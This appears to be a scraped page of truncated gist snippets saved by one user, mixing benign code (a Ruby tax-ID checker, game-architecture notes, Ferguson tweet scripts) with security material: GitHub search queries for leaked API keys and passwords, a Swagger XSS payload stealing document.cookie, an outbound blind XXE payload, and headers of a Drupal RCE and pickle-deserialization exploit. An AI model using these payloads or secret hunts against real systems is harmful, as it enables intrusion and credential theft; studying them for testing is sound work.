manuelbua

In August 2007 a hacker found a way to expose the PHP source code on facebook.com. He retrieved two files and then emailed them to me, and I wrote about the issue:

http://techcrunch.com/2007/08/11/facebook-source-code-leaked/

It became a big deal:

http://www.techmeme.com/070812/p1#a070812p1

The two files are index.php (the homepage) and search.php (the search page)

manuelbua

https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI

manuelbua

swagger: "2.0",
info: 
  title: "Swagger XSS test",
  description: "Please click the Terms of service"
  termsOfService: "javascript:alert(document.cookie)"
  contact: 
    name: "API Support",
    url: "javascript:alert(document.cookie)",
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"

manuelbua

#!/usr/bin/env python3

# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
# 2019 @leonjza

# Technical details for this exploit is available at:
#   https://www.drupal.org/sa-core-2019-003
#   https://www.ambionics.io/blog/drupal8-rce
#   https://twitter.com/jcran/status/1099206271901798400

manuelbua

#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#

import cPickle
import sys
import base64

manuelbua

# encoding: utf-8

def company_serial_no_checker(serial)

  # 共八位，全部為數字型態
  at_least_8_digits =  /^\d{8}$/
  return false unless at_least_8_digits.match(serial)

  # 各數字分別乘以 1,2,1,2,1,2,4,1
  # 例：統一編號為 53212539

manuelbua

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

manuelbua

For background and further references see: Entity Component Systems on Wikipedia

ECS by Scott Bilas (GDC 2002)

Entity->Components->Update

• entity = class: no logic + no data OR at most small set of frequently used data (ie position)
• component = class: logic + data

foreach entity in allEntities do
    foreach component in entity.components do

manuelbua

'''
Rewrite with Twittcher ;)
Result (every 20 seconds):
>>> Most common words: [('ferguson', 41), ('http', 28), ('protests', 9),
                        ('missouri', 9), ('leave', 8), ('continue', 8),...]
'''

import re
from collections import Counter
from twittcher import SearchWatcher

manuelbua

'''
A script for analyzing twitter stats on Ferguson
'''
import json
import re

import tweepy

def get_api():
    '''